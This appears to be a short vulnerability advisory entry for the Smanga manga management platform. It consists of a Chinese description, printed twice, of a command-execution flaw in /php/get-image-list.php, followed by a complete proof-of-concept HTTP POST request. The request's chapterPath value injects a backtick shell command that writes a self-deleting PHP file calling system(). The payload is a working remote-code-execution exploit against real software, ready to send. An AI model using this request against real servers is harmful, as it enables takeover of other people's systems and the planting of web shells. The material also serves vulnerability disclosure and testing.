Description
Smanga动漫管理平台的/php/get-image-list.php文件存在命令执行漏洞,攻击者可以通过该漏洞在服务器上执行任意命令,进一步控制服务器。
Smanga动漫管理平台的/php/get-image-list.php文件存在命令执行漏洞,攻击者可以通过该漏洞在服务器上执行任意命令,进一步控制服务器。
POST /php/get-image-list.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Accept-Encoding: gzip
Connection: close
chapterType=7z&chapterPath=`echo "<?php system('(echo+b778fbFb7f7C8CAa)');unlink(__FILE__);?>" > jhrud6438g.php`
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.